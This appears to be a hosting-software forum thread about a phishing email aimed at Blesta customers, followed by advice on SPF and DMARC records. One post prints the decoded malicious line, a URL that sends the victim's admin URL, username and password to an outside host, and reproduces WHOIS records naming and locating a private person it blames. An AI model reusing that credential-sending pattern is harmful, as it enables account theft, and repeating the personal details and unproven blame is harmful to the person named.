Jump to content

[Important] Beware Of Blesta Phishing Scam

Michael

By Michael
in News

 Share

Recommended Posts

Paul Rising Star

Paul

Posted
Posted

Yeah, PauloV decoded it.
 
I debated not posting this information but here's where the file sends your admin details:

https://my.dorob.de/modules/addons/passwords/insert.php?url=" . $url . "&user=" . $u . "&pw=" . $p

Domain is registered to:
 

Domain: dorob.de
Nserver: ns1.dorob.de 213.9.14.107
Nserver: ns2.dorob.de 217.79.214.245
Nserver: ns3.dorob.de 89.202.121.167
Status: connect
Changed: 2014-06-29T15:52:08+02:00
 
[Tech-C]
Type: PERSON
Name: Eric Klemme
Organisation: EK-Webservices
Address: Eckernfoerder Strasse 73
PostalCode: 24116
City: Kiel
CountryCode: DE
Phone: +49 431498760
Fax: +49 431498760
Email: webmaster@dorob.de
Changed: 2014-06-18T19:21:09+02:00
 
[Zone-C]
Type: PERSON
Name: Eric Klemme
Organisation: EK-Webservices
Address: Eckernfoerder Strasse 73
PostalCode: 24116
City: Kiel
CountryCode: DE
Phone: +49 431498760
Fax: +49 431498760
Email: webmaster@dorob.de
Changed: 2014-06-18T19:21:09+02:00

 
IP address is 37.228.135.135 which belongs to:
 

[Querying whois.ripe.net]
[whois.ripe.net]
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
 
% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.
 
% Information related to '37.228.128.0 - 37.228.151.255'
 
% Abuse contact for '37.228.128.0 - 37.228.151.255' is 'abuse@weesly.de'
 
inetnum:        37.228.128.0 - 37.228.151.255
netname:        DE-WEESLY-20120410
descr:          Thomas Schoebel trading as Weesly
country:        DE
org:            ORG-TSta3-RIPE
admin-c:        TS7212-RIPE
tech-c:         TS7212-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      MNT-WEESLY
mnt-routes:     MNT-WEESLY
source:         RIPE # Filtered
 
organisation:   ORG-TSta3-RIPE
org-name:       Thomas Schoebel trading as Weesly
org-type:       LIR
address:        Thomas Moehring trading as Weesly
address:        Ahrensburger Stieg 19
address:        22359
address:        Hamburg
address:        GERMANY
phone:          +4940228171220
fax-no:         +4940228171229
mnt-ref:        RIPE-NCC-HM-MNT
mnt-ref:        MNT-WEESLY
mnt-by:         RIPE-NCC-HM-MNT
abuse-c:        AW4405-RIPE
source:         RIPE # Filtered
 
person:         Thomas Schoebel
address:        Ahrensburger Stieg 19
address:        22359 Hamburg
phone:          +49.40228171220
fax-no:         +49.40228171229
abuse-mailbox:  abuse@weesly.de
remarks:        *******************************************
remarks:        *     SPAM / ABUSE / SECURITY / OTHERS    *
remarks:        *******************************************
remarks:        *  For spam/abuse/security issues please  *
remarks:        *  contact us directly: Abuse@weesly.de   *
remarks:        *******************************************
remarks:        *  Complete Contact information you'll    *
remarks:        *  get on our website: www.weesly.de      *
remarks:        *******************************************
remarks:        * For other information or issues please  *
remarks:        * sent to Hostmaster@weesly.de            *
remarks:        *******************************************
nic-hdl:        TS7212-RIPE
mnt-by:         MNT-WEESLY
source:         RIPE # Filtered
 
% Information related to '37.228.128.0/20AS198599'
 
route:          37.228.128.0/20
descr:          IP Routing via Weesly.de
origin:         AS198599
mnt-by:         MNT-WEESLY
source:         RIPE # Filtered
 
% This query was served by the RIPE Database Query Service version 1.75 (DB-4)

 
This person also has the twitter account https://twitter.com/dorobde and was critical of Blesta in this tweet: https://twitter.com/DoRobDE/status/507934296829861888
 
 

@billingbrawl I find blesta really cool and would have bought it - but it is really uncool, that you make bad advertisement for competition.

Michael Apprentice

Michael

Posted
  • Author
Posted

 

Thanks for decoding! Could someone send me the decrypted file?

At the moment I think I'm the only one client who received this e-mail. I think it's a targeted attack on our company.

 

We will pass the information to the German police.

 

 

Glad you didn't fool for it

wfitg Newbie

wfitg

Posted
Posted

Here is a good write up on setting DNS SPF record to prevent your domain name from being spoofed; It also stops spoofed email from coming to your box if the "hard fail" element is used.

https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability

Most cPanels create SFP with the hard fail. "v=spf1 -all"

But it is better to use the the soft fail. This way you get the spoofed email, but it is tagged as suspicious: "v=spf1 ~all"

Michael Apprentice

Michael

Posted
  • Author
Posted

Here is a good write up on setting DNS SPF record to prevent your domain name from being spoofed; It also stops spoofed email from coming to your box if the "hard fail" element is used.

https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability

Most cPanels create SFP with the hard fail. "v=spf1 -all"

But it is better to use the the soft fail. This way you get the spoofed email, but it is tagged as suspicious: "v=spf1 ~all"

 

Yeah I think however that only works for fake @domain.com not domain.com@gmail.com we have: DMARC which again like SPF works at ensuring the IP is correct of the sender.

 

v=DMARC1; p=quarantine; pct=50; adkim=strict;

 

but it quarantines fakes, but only 50% of it (This is to ensure real emails don't get effected whilst the inboxes are learning).

wfitg Newbie

wfitg

Posted
Posted

Yeah I think however that only works for fake @domain.com not domain.com@gmail.com

Correct. Nothing can stop someone from using domain.com@gmail.com --except for being observant.

I know it does work if someone is trying to spoof the actual domain name. For example, the mail server would bounce an email from sales@blesta.com if: (1)the blesta zone file has an SPF record set and (2)the email is not originating from blesta's email server.

Of course, nothing in life is 100% but I can say that using this has cut down on my domain being spoofed and on the amount of spoofed emails that I receive.

If I had a complany like Blesta I would probaby use the "soft fail" [ "v=spf1 ~all" ] flag so I could still get the email but also be alerted that it may not be coming from the correct server.

The hard fail option is good for invividuals who do not want to get any spoofed mail at all.

Michael Apprentice

Michael

Posted
  • Author
Posted

Correct. Nothing can stop someone from using domain.com@gmail.com --except for being observant.

I know it does work if someone is trying to spoof the actual domain name. For example, the mail server would bounce an email from sales@blesta.com if: (1)the blesta zone file has an SPF record set and (2)the email is not originating from blesta's email server.

Of course, nothing in life is 100% but I can say that using this has cut down on my domain being spoofed and on the amount of spoofed emails that I receive.

If I had a complany like Blesta I would probaby use the "soft fail" [ "v=spf1 ~all" ] flag so I could still get the email but also be alerted that it may not be coming from the correct server.

The hard fail option is good for invividuals who do not want to get any spoofed mail at all.

DMARC is good for this you get a copy which failed sent to you.

wfitg Newbie

wfitg

Posted
Posted

Yeah I think however that only works for fake @domain.com not domain.com@gmail.com we have: DMARC which again like SPF works at ensuring the IP is correct of the sender.

 

v=DMARC1; p=quarantine; pct=50; adkim=strict;

 

but it quarantines fakes, but only 50% of it (This is to ensure real emails don't get effected whilst the inboxes are learning).

This looks great.

I may start using DMARK too. However, if the person is on a shared server, but they have a dedicated IP for an SSL this could cause a problem. Their mail is comes from the shared servers's IP address, notfrom their dedicated IP. They will have to add an A record with the shared mail server's IP. Not many users know how to add DNS records so their mail will be bounced.

Michael Apprentice

Michael

Posted
  • Author
Posted

This looks great.

I may start using DMARK too. However, if the person is on a shared server, but they have a dedicated IP for an SSL this could cause a problem. Their mail is comming from the shared servers's IP address, notfrom their dedicated IP. They will have to add an A record with the shared mail server's IP. Not many users know how to add DNS records so their mail will be bounced.

 

It's per domain so every user can have their own one. If they use it and use a dedicated IP they can set a SPF record to accept emails from both eg: 

v=spf1 a mx ptr ip4:216.220.167.249 mx:mail.licensecart.com ip4:216.220.167.248 -all 

thats ours.

wfitg Newbie

wfitg

Posted
Posted

It's per domain so every user can have their own one. If they use it and use a dedicated IP they can set a SPF record to accept emails from both eg: 

v=spf1 a mx ptr ip4:216.220.167.249 mx:mail.licensecart.com ip4:216.220.167.248 -all 
thats ours.

The -all will reject everything that does not pass. I like to use ~all because I can still get the flagged email. I simply setup a rule to have those flagged emails go to thje flagged folder. Then I can scan through them for any mistaken failures (or someone who simply does not have the records set correctly) and also remember those that are frequent abusers. The frequent ones can be can be blocked on ACL or IP Tables.

I guess whatever works is the answer as long as something is in place to prevent domain spoofing. This will stop many of the script kiddies and wannabe hackers, but a determined spammer will try other methods than spoofing to hijack an email server.

Michael Apprentice

Michael

Posted
  • Author
Posted

The -all will reject everything that does not pass. I like to use ~all because I can still get the flagged email. I simply setup a rule to have those flagged emails go to thje flagged folder. Then I can scan through them for any mistaken failures (or someone who simply does not have the records set correctly) and also remember those that are frequent abusers. The frequent ones can be can be blocked on ACL or IP Tables.

I guess whatever works is the answer as long as something is in place to prevent domain spoofing. This will stop many of the script kiddies and wannabe hackers, but a determined spammer will try other methods than spoofing to hijack an email server.

 

The thing is this wannabe hacker forgot if someone decoded it he's domain would be there, which then linked to the stupid tweet we know about and then linked to a visible who.is, and a team page which we could google their name...

wfitg Newbie

wfitg

Posted
Posted

The thing is this wannabe hacker forgot if someone decoded it he's domain would be there, which then linked to the stupid tweet we know about and then linked to a visible who.is, and a team page which we could google their name...

Yeah, he is busted. What an idiot.

We have too many experienced webmasters, coders, and admins here for a scrpit kiddie to get away with much. An experienced spammer/hacker would not bother with such nonsense as this. They just want to send their spam.

It looks like a deliberate attempt to make the Blesta company look bad.

---------------------

here is an SPF generator if anyone needs it

http://www.spfwizard.net/

Microsoft makes one too:

http://www.microsoft.com/mscorp/safety/content/technologies/senderid/wizard/

silvatech Newbie

silvatech

Posted
Posted

 

Thanks for decoding! Could someone send me the decrypted file?

At the moment I think I'm the only one client who received this e-mail. I think it's a targeted attack on our company.

 

We will pass the information to the German police.

 

 

 

I have a feeling you may have been targeted as well if noone else has gotten this email. Please let me know what happens after you contact the police and that I am currios.

Paul Rising Star

Paul

Posted
Posted

 

Thanks for decoding! Could someone send me the decrypted file?

At the moment I think I'm the only one client who received this e-mail. I think it's a targeted attack on our company.

 

We will pass the information to the German police.

 

 

Anyone send you the decoded file? The ISP is telling me they are aware of the police investigation. I'm curious how it turns out, and wish you the best of luck.

  • 1 month later...
 Share
Go to topic listing
×
×
  • Create New...